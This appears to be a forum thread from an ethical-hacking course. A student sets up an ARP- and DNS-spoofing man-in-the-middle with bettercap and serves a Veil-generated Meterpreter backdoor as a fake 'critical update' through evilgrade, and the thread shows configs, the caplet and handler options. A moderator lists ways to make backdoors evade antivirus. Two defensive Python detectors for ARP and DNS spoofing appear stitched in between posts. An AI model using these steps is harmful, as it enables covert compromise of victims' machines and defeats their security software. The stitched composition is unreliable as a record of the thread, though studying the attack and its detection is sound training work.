#42939 Terrensu (Participant)

Hey,

Sorry to bother you, however when I was working on the content displayed in lecture 16.8, everything was fine until the last part, where Mr Zaid downloads the installer from DAP. I tried to do that on my Windows machine and got a message of '400 bad connection' when I tried to access the website; however, other websites did work. I tried to install the DAP installer on another website, which worked, however when I opened it, no meterpreter session was created. How can I fix this?

Thanks.

#42940 Terrensu (Participant)

Also, when I try to access other websites an error of HTTPError('invalid http request form', expected absolute, got relative) would occur.

#42941 Terrensu (Participant)

A similar problem also occurred in 16.7: everything worked fine until I clicked 'update now' in the DAP client, where it would display an error of 'Discovered an error in the component list' and stop me going any further. Please help.

#43043 diegodiego (Moderator)

Hi!
Did your backdoor work if you run it on its own?
Can you show me the following please:
1. Result of ifconfig in Kali.
2. The result of ipconfig in Windows.
3. The configuration for evilgrade.
4. The result of show options before running the multi handler.
5. Bettercap's version and command used to start it.
6. The contents of the arp spoof caplet.
7. The result of: get dns.spoof.*

Let me know.
Diego

#43050 Terrensu (Participant)

Hey Diego:

Thanks for replying, below is the information you're seeking!
ifconfig:

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
        inet6 fe80::a00:27ff:fe59:fbfa  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:59:fb:fa  txqueuelen 1000  (Ethernet)
        RX packets 6  bytes 900 (900.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27  bytes 2314 (2.2 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 24  bytes 1356 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 1356 (1.3 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

Configuration for evilgrade:
Payload: go/meterpreter/rev_http selected

Required Options:

Name            Value      Description
----            -----      -----------
BADMACS         FALSE      Check for VM based MAC addresses
CLICKTRACK      X          Require X number of clicks before execution
COMPILE_TO_EXE  Y          Compile to an executable
CURSORCHECK     FALSE      Check for mouse movements
DISKSIZE        X          Check for a minimum number of gigs for hard disk
HOSTNAME        X          Optional: Required system hostname
INJECT_METHOD   Virtual    Virtual or Heap
LHOST           10.0.2.15  IP of the Metasploit handler
LPORT           8080       Port of the Metasploit handler
MINPROCS        X          Minimum number of running processes
PROCCHECK       FALSE      Check for active VM processes
PROCESSORS      1          Optional: Minimum number of processors
RAMCHECK        FALSE      Check for at least 3 gigs of RAM
SLEEP           5          Optional: Sleep "Y" seconds, check if accelerated
USERNAME        X          Optional: The required user account
USERPROMPT      FALSE      Prompt user prior to injection
UTCCHECK        FALSE      Check if system uses UTC time

The result of show options in msfconsole:

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The local listener hostname
   LPORT     8080             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Bettercap's version and command used to start it:
[email protected]:~# bettercap -iface eth0 -caplet /root/spoof.cap
bettercap v2.23 (built for linux amd64 with go1.11.6) [type 'help' for a list of commands]

[00:26:15] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
[00:26:15] [endpoint.new] endpoint 10.0.2.3 detected as 08:00:27:b5:47:34 (PCS Computer Systems GmbH).
[00:26:15] [sys.log] [inf] arp.spoof enabling forwarding
[00:26:15] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
[00:26:15] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.

The contents of the arp spoof caplet:
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on
set net.sniff.local true
net.sniff on

I'm a bit confused on how to get dns.spoof?

#43051 Terrensu (Participant)

The IP address of the Windows machine is 10.0.2.7, and the MAC address of the router (10.0.2.1) did change after I ran the bettercap command; the MAC address turned into the same address as the Linux machine.
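
The symptom described in the post above (the router's IP suddenly carrying the Kali host's MAC) is exactly what a host-side ARP monitor looks for. The script below is an added defensive example, not code from this thread or from bettercap. It parses a constructed Windows `arp -a` listing built from the addresses quoted in the thread (gateway 10.0.2.1, Windows host 10.0.2.7, Kali 10.0.2.15 with MAC 08:00:27:59:fb:fa) and compares it against a hypothetical baseline router MAC; it reports a changed gateway MAC and any MAC claimed by more than one IP, the two things full-duplex ARP spoofing leaves behind in a victim's cache.

```python
"""Host-side ARP spoof detector (added example, not code from the thread or bettercap).

It parses the text of a Windows `arp -a` listing, then reports two symptoms of
ARP cache poisoning: the default gateway's MAC differing from a recorded
baseline, and one MAC address being claimed by more than one IP address.
The sample listing and the baseline MAC are constructed for this example;
the IPs and the 08:00:27:59:fb:fa MAC are the ones quoted in the thread.
"""
import re
from collections import defaultdict

# Constructed `arp -a` output as the Windows host (10.0.2.7) would show it
# while the gateway entry has been poisoned with the Kali host's MAC.
SAMPLE_ARP_TABLE = """\
Interface: 10.0.2.7 --- 0x5
  Internet Address      Physical Address      Type
  10.0.2.1              08-00-27-59-fb-fa     dynamic
  10.0.2.3              08-00-27-b5-47-34     dynamic
  10.0.2.15             08-00-27-59-fb-fa     dynamic
  10.0.2.255            ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Hypothetical baseline recorded on a clean network (not a value from the thread).
BASELINE = {"10.0.2.1": "08:00:27:aa:bb:cc"}
GATEWAY = "10.0.2.1"

# One neighbour line: IPv4, MAC with ':' or '-' separators, entry type.
ENTRY_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)"
)


def normalize_mac(mac: str) -> str:
    """Windows prints 08-00-27-..., Linux prints 08:00:27:...; compare one form."""
    return mac.lower().replace("-", ":")


def parse_arp_table(text: str) -> dict:
    """Return {ip: mac} for unicast neighbours, skipping broadcast/multicast rows."""
    table = {}
    for line in text.splitlines():
        match = ENTRY_RE.match(line)
        if not match:
            continue                      # interface header, column header, blank
        ip, mac, _entry_type = match.groups()
        mac = normalize_mac(mac)
        if mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e"):
            continue                      # broadcast / IPv4 multicast, never a host
        table[ip] = mac
    return table


def find_arp_anomalies(table: dict, baseline: dict, gateway: str) -> list:
    """List human-readable findings; an empty list means nothing suspicious."""
    findings = []
    # Symptom 1: the gateway answers with a MAC other than the one we recorded.
    if gateway in table and gateway in baseline and table[gateway] != baseline[gateway]:
        findings.append(
            f"gateway {gateway} MAC changed from {baseline[gateway]} to {table[gateway]}"
        )
    # Symptom 2: two IPs share one MAC, which is what full-duplex spoofing produces.
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(f"MAC {mac} is claimed by {sorted(ips)}")
    return findings


if __name__ == "__main__":
    for finding in find_arp_anomalies(parse_arp_table(SAMPLE_ARP_TABLE), BASELINE, GATEWAY):
        print("ALERT:", finding)
```

On a real host you would feed `parse_arp_table` the live output of `arp -a` (or `ip neigh` on Linux, which the same regex accepts because it normalizes both MAC separators) and record the baseline from a known-clean state; the duplicate-MAC check needs no baseline at all, which makes it the more robust of the two.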

#43052 Terrensu (Participant)

And here is the evilgrade configuration:
Name = Download Accelerator
Version = 1.0
Author = ["Francisco Amato < famato +[AT]+ infobytesec.com>"]
Description = ""
VirtualHost = "(update.speedbit.com)"

.-------------+--------------------------------------------------------+-------------------------------------------.
| Name        | Default                                                | Description                               |
+-------------+--------------------------------------------------------+-------------------------------------------+
| title       | Critical update                                        | Title name display in the update          |
| failsite    | http://www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did't finish update  |
| enable      | 1                                                      | Status                                    |
| agent       | /var/lib/veil/output/compiled/Pay.exe                  | Agent to inject                           |
| endsite     | speedbit.com                                           | Website display when finish update        |
| description | This critical update fix internal vulnerability        | Description display in the update         |
'-------------+--------------------------------------------------------+-------------------------------------------'

#43053 Terrensu (Participant)

After running everything again, the DAP software on my Windows PC was able to detect the update; however, when I ran it, no session was created in msfconsole.

#43054 Terrensu (Participant)

HTTPSError('Invalid HTTPS request form (expected: absolute, got: relative)')

was the error shown when I tried to access speedbit.com like Mr Zaid did in lecture 16.8; everything went back to normal once I closed the services on the Kali machine.

#43108 diegodiego (Moderator)

Hi!
Did the backdoor work if you run it on its own?

Can you share the result of get dns.spoof.* ?

Let me know.
Diego

#43119 Terrensu (Participant)

Hey,

How do I deliver the backdoor to my Windows machine, and how do I get the result of dns.spoof? Is it just the lines of output after I run bettercap?

Sorry to bother you.

#43134 Terrensu (Participant)

Hey Diego,

I was able to send my backdoor to my Windows machine and a meterpreter session was created on my Linux machine, although I found out that Windows didn't allow me to download the backdoor, so I had to manually switch off Windows Defender, which obviously isn't going to happen in a real-life scenario. Any suggestions on how I can fix it? Furthermore, I'm still a bit confused on how to get the results of dns.spoof.

Sorry for bothering.

#43176 diegodiego (Moderator)

Hi!
For the results of the dns.spoof module just run the command in the bettercap terminal when you have done all your settings:

get dns.spoof.*

Also keep Defender disabled. To bypass it:
Basically bypassing AV programs is like a game of cat and mouse, so backdoors might start getting detected at some stage, then the developers release an update, this will allow you to generate undetectable backdoors, then AV programs release an update which will make backdoors detectable...
So the main thing is to make sure that Veil or any other tool you're using to generate the backdoor is up to date.
Here's a few solutions to try if your backdoor is getting detected:
1. Make sure that you have the latest version of Veil, so do update before doing use 1.
2. Experiment with different payloads, and experiment with different payload options, and you should be able to bypass it.
3. Try generating a backdoor using TheFatRat or Empire (tutorial link for Empire in the resources of lecture 68).
4. Modify the backdoor code if it's in bat (covered in my social engineering course).
5. Modify the backdoor using a hex editor (covered in my social engineering course).
6. Create your own backdoor (covered in my Python course).
The best thing to do is look at the last lecture of the course (bonus lecture); it contains all the courses that you can take with this course and a comparison between them.

Also check out this video:

How To Create Fully Undetectable Backdoors

Hope it helps!
Diego

#43240 Terrensu (Participant)

Hey Diego,

When I enter the command get dns.spoof in Kali, it returns an error saying sys.log [err] dns.spoof not found. How can I fix this?

Thanks

#43241 Terrensu (Participant)

Hey Diego,

Is it this thing?
dns.spoof.address: '<interface address>'
dns.spoof.all: 'true'
dns.spoof.domains: 'update.speedbit.com'
dns.spoof.hosts: ''

Regards,
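
The `get dns.spoof.*` output above shows the setting that makes this kind of spoofing visible from the victim's side: `dns.spoof.address` defaults to the sniffing interface's own address, so the spoofed name (update.speedbit.com here) suddenly resolves to an address inside the LAN. The script below is an added defensive example, not code from the thread or from bettercap: it parses a raw DNS response (a minimal parser with name-compression support, written for this example) and flags A records that point a queried name into the local subnet or an RFC 1918 range. The two DNS messages it checks are constructed inline; the "normal" one uses a documentation address, not speedbit.com's real IP.

```python
"""Flag DNS answers that point a public hostname into the LAN (added example).

This is not code from the thread or from bettercap. bettercap's dns.spoof
answers with the sniffing interface's own address by default (the thread's
`get dns.spoof.*` output shows dns.spoof.address = '<interface address>'), so
a public name such as update.speedbit.com resolving to 10.0.2.x is the
symptom a resolver-side check can catch. The DNS messages are constructed here.
"""
import ipaddress
import struct

# RFC 1918 ranges; a public name should never resolve into these.
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def build_a_response(txid: int, name: str, ip: str, ttl: int = 300) -> bytes:
    """Assemble a minimal DNS response carrying one A record (test input only)."""
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1, RD=1, RA=1; 1 question, 1 answer
    question = qname + struct.pack("!HH", 1, 1)                # QTYPE A, QCLASS IN
    answer = (b"\xc0\x0c"                                      # compression pointer to the name at offset 12
              + struct.pack("!HHIH", 1, 1, ttl, 4)             # TYPE A, CLASS IN, TTL, RDLENGTH
              + ipaddress.IPv4Address(ip).packed)
    return header + question + answer


def read_name(msg: bytes, offset: int):
    """Decode a possibly compressed DNS name; return (dotted name, offset after it)."""
    labels, jumped, end = [], False, offset
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                              # pointer: 2 bytes, 14-bit offset
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2                               # caller resumes after the pointer
            jumped, offset = True, pointer
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    if not jumped:
        end = offset
    return ".".join(labels), end


def parse_a_records(msg: bytes) -> list:
    """Return [(name, ipv4)] for every A record in the answer section."""
    _txid, _flags, qdcount, ancount, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    offset = 12
    for _ in range(qdcount):                                   # skip the question section
        _, offset = read_name(msg, offset)
        offset += 4                                            # QTYPE + QCLASS
    records = []
    for _ in range(ancount):
        name, offset = read_name(msg, offset)
        rtype, rclass, _ttl, rdlength = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata = msg[offset:offset + rdlength]
        offset += rdlength
        if rtype == 1 and rclass == 1 and rdlength == 4:
            records.append((name, str(ipaddress.IPv4Address(rdata))))
    return records


def suspicious_answers(msg: bytes, local_net: str) -> list:
    """Answers for any name that land in the local subnet or an RFC 1918 range."""
    nets = RFC1918 + [ipaddress.ip_network(local_net)]
    return [(name, ip) for name, ip in parse_a_records(msg)
            if any(ipaddress.ip_address(ip) in net for net in nets)]


# Constructed samples: a reply as dns.spoof would forge it, and a normal one.
SPOOFED_REPLY = build_a_response(0x1234, "update.speedbit.com", "10.0.2.15")
NORMAL_REPLY = build_a_response(0x1235, "update.speedbit.com", "198.51.100.7")  # documentation address, not speedbit's real IP

if __name__ == "__main__":
    for label, reply in (("spoofed", SPOOFED_REPLY), ("normal", NORMAL_REPLY)):
        print(label, parse_a_records(reply), "->", suspicious_answers(reply, "10.0.2.0/24") or "ok")
```

In practice this check sits on the resolver path (a packet capture filter on UDP/53, or a stub resolver wrapper) and is paired with an out-of-band lookup over an encrypted channel; a public name answering with a LAN address while an ARP anomaly is also present is about as clear a man-in-the-middle signal as a host can get without help from the switch.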
